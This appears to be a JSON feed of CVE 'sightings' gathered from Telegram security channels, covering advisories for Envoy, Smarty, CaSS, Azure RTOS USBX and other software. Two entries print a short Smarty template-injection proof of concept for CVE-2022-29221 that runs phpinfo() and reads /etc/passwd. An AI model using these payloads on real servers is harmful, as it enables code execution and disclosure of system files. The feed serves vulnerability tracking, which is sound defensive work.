{"vulnerability": "CVE-2022-2922", "sightings": [{"uuid": "3754f331-a85b-4635-a627-662c91c8b190", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29221", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9613", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day: CVE-2022-29221 Proof of Concept Code.\n\nhttps://github.com/sbani/CVE-2022-29221-PoC", "creation_timestamp": "2022-05-28T06:16:34.000000Z"}, {"uuid": "4c58e701-d2fb-4abf-8f8e-b3aee32cf6e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29221", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2280", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-29221 Proof of Concept Code\nURL\uff1ahttps://github.com/sbani/CVE-2022-29221-PoC\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-25T06:03:59.000000Z"}, {"uuid": "70f969ff-95fd-4446-97aa-f276d845e732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-2922", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-2922\n\ud83d\udd25 CVSS Score: 4.9 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Relative Path Traversal in GitHub repository dnnsoftware/dnn.platform prior to 9.11.0.\n\ud83d\udccf Published: 2022-09-30T06:45:13.000Z\n\ud83d\udccf Modified: 2025-05-20T16:03:33.907Z\n\ud83d\udd17 References:\n1. https://huntr.dev/bounties/74918f40-dc11-4218-abef-064eb71a0703\n2. https://github.com/dnnsoftware/dnn.platform/commit/9b17351592fbde376506ba6705dbcc7a74a2a195", "creation_timestamp": "2025-05-20T16:41:02.000000Z"}, {"uuid": "ce107b09-c218-46f1-88c7-1cdc4211c034", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29225", "type": "seen", "source": "https://t.me/cibsecurity/44154", "content": "\u203c CVE-2022-29225 \u203c\n\nEnvoy is a cloud-native high-performance proxy. In versions prior to 1.22.1 secompressors accumulate decompressed data into an intermediate buffer before overwriting the body in the decode/encodeBody. This may allow an attacker to zip bomb the decompressor by sending a small highly compressed payload. Maliciously constructed zip files may exhaust system memory and cause a denial of service. Users are advised to upgrade. Users unable to upgrade may consider disabling decompression.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-10T00:33:45.000000Z"}, {"uuid": "9a71dc95-3c9c-4622-b1ea-1f534649575d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29227", "type": "seen", "source": "https://t.me/cibsecurity/44152", "content": "\u203c CVE-2022-29227 \u203c\n\nEnvoy is a cloud-native high-performance edge/middle/service proxy. In versions prior to 1.22.1 if Envoy attempts to send an internal redirect of an HTTP request consisting of more than HTTP headers, there\u00c3\u00a2\u00e2\u201a\u00ac\u00e2\u201e\u00a2s a lifetime bug which can be triggered. If while replaying the request Envoy sends a local reply when the redirect headers are processed, the downstream state indicates that the downstream stream is not complete. On sending the local reply, Envoy will attempt to reset the upstream stream, but as it is actually complete, and deleted, this result in a use-after-free. Users are advised to upgrade. Users unable to upgrade are advised to disable internal redirects if crashes are observed.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-10T00:33:43.000000Z"}, {"uuid": "7c7b6b1a-dd80-427a-9093-5e912a1fe854", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29228", "type": "seen", "source": "https://t.me/cibsecurity/44147", "content": "\u203c CVE-2022-29228 \u203c\n\nEnvoy is a cloud-native high-performance proxy. In versions prior to 1.22.1 the OAuth filter would try to invoke the remaining filters in the chain after emitting a local response, which triggers an ASSERT() in newer versions and corrupts memory on earlier versions. continueDecoding() shouldn\u00c3\u00a2\u00e2\u201a\u00ac\u00e2\u201e\u00a2t ever be called from filters after a local reply has been sent. Users are advised to upgrade. There are no known workarounds for this issue.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-10T00:33:38.000000Z"}, {"uuid": "746b8b00-7d35-453f-b3eb-e7d4faef6fc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29226", "type": "seen", "source": "https://t.me/cibsecurity/44145", "content": "\u203c CVE-2022-29226 \u203c\n\nEnvoy is a cloud-native high-performance proxy. In versions prior to 1.22.1 the OAuth filter implementation does not include a mechanism for validating access tokens, so by design when the HMAC signed cookie is missing a full authentication flow should be triggered. However, the current implementation assumes that access tokens are always validated thus allowing access in the presence of any access token attached to the request. Users are advised to upgrade. There is no known workaround for this issue.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-10T00:33:36.000000Z"}, {"uuid": "dd811351-efce-43a9-8c7a-07068272a93f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29229", "type": "seen", "source": "https://t.me/cibsecurity/42960", "content": "\u203c CVE-2022-29229 \u203c\n\nCaSS is a Competency and Skills System. CaSS Library, (npm:cassproject) has a missing cryptographic step when storing cryptographic keys that can allow a server administrator access to an account\u00e2\u20ac\u2122s cryptographic keys. This affects CaSS servers using standalone username/password authentication, which uses a method that expects e2e cryptographic security of authorization credentials. The issue has been patched in 1.5.8, however, the vulnerable accounts are only resecured when the user next logs in using standalone authentication, as the data required to resecure the account is not available to the server. The issue may be mitigated by using SSO or client side certificates to log in. Please note that SSO and client side certificate authentication does not have this expectation of no-knowledge credential access, and cryptographic keys are available to the server administrator.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-19T00:28:47.000000Z"}, {"uuid": "8d80834f-1d39-4fc0-9859-c2c636692952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29223", "type": "seen", "source": "https://t.me/cibsecurity/43261", "content": "\u203c CVE-2022-29223 \u203c\n\nAzure RTOS USBX is a USB host, device, and on-the-go (OTG) embedded stack. In versions prior to 6.1.10, an attacker can cause a buffer overflow by providing the Azure RTOS USBX host stack a HUB descriptor with `bNbPorts` set to a value greater than `UX_MAX_TT` which defaults to 8. For a `bNbPorts` value of 255, the implementation of `ux_host_class_hub_descriptor_get` function will modify the contents of `hub` -> `ux_host_class_hub_device` -> `ux_device_hub_tt` array violating the end boundary by 255 - `UX_MAX_TT` items. The USB host stack needs to validate the number of ports reported by the hub, and if the value is larger than UX_MAX_TT, USB stack needs to reject the request. This fix has been included in USBX release 6.1.10.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-24T18:37:11.000000Z"}, {"uuid": "cf4a69c2-c453-4dc7-bf70-f560d9ea2451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29222", "type": "seen", "source": "https://t.me/cibsecurity/43136", "content": "\u203c CVE-2022-29222 \u203c\n\nPion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.5, a DTLS Client could provide a Certificate that it doesn't posses the private key for and Pion DTLS wouldn't reject it. This issue affects users that are using Client certificates only. The connection itself is still secure. The Certificate provided by clients can't be trusted when using a Pion DTLS server prior to version 2.1.5. Users should upgrade to version 2.1.5 to receive a patch. There are currently no known workarounds.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-21T07:47:54.000000Z"}, {"uuid": "4329fe65-9fcd-4873-b0c9-8d1560826241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29221", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1773", "content": "Smarty PHP Code Injection\n< 3.1.45 / >= 4.0.0 / < 4.1.1\nCVE-2022-29221\nPoC:\n{block name='*/phpinfo();/*'}{/block}\n{include file='string:*/include\"/etc/passwd\";exit;/*' inline=1}\nhttps://github.com/advisories/GHSA-634x-pc3q-cf4c\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-06-19T19:04:30.000000Z"}, {"uuid": "90df5c15-e6d9-4a34-a3f6-732325807902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29224", "type": "seen", "source": "https://t.me/cibsecurity/44137", "content": "\u203c CVE-2022-29224 \u203c\n\nEnvoy is a cloud-native high-performance proxy. Versions of envoy prior to 1.22.1 are subject to a segmentation fault in the GrpcHealthCheckerImpl. Envoy can perform various types of upstream health checking. One of them uses gRPC. Envoy also has a feature which can \u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201chold\u00c3\u00a2\u00e2\u201a\u00ac? (prevent removal) upstream hosts obtained via service discovery until configured active health checking fails. If an attacker controls an upstream host and also controls service discovery of that host (via DNS, the EDS API, etc.), an attacker can crash Envoy by forcing removal of the host from service discovery, and then failing the gRPC health check request. This will crash Envoy via a null pointer dereference. Users are advised to upgrade to resolve this vulnerability. Users unable to upgrade may disable gRPC health checking and/or replace it with a different health checking type as a mitigation.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-09T22:33:30.000000Z"}, {"uuid": "d8b20c8a-9818-4dcd-9f7a-15f2ed926bb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29221", "type": "published-proof-of-concept", "source": "https://t.me/antichat/9882", "content": "Smarty PHP Code Injection\n< 3.1.45 / >= 4.0.0 / < 4.1.1\nCVE-2022-29221\n\nPoC:\n\n{block name='*/phpinfo();/*'}{/block}\n{include file='string:*/include\"/etc/passwd\";exit;/*' inline=1}", "creation_timestamp": "2022-06-19T11:03:38.000000Z"}, {"uuid": "1d0660e7-f222-47af-b12c-e3bd8f8c0bb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29220", "type": "seen", "source": "https://t.me/cibsecurity/43572", "content": "\u203c CVE-2022-29220 \u203c\n\ngithub-action-merge-dependabot is an action that automatically approves and merges dependabot pull requests (PRs). Prior to version 3.2.0, github-action-merge-dependabot does not check if a commit created by dependabot is verified with the proper GPG key. There is just a check if the actor is set to `dependabot[bot]` to determine if the PR is a legit PR. Theoretically, an owner of a seemingly valid and legit action in the pipeline can check if the PR is created by dependabot and if their own action has enough permissions to modify the PR in the pipeline. If so, they can modify the PR by adding a second seemingly valid and legit commit to the PR, as they can set arbitrarily the username and email in for commits in git. Because the bot only checks if the actor is valid, it would pass the malicious changes through and merge the PR automatically, without getting noticed by project maintainers. It would probably not be possible to determine where the malicious commit came from, as it would only say `dependabot[bot]` and the corresponding email-address. Version 3.2.0 contains a patch for this issue.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-31T20:23:50.000000Z"}]}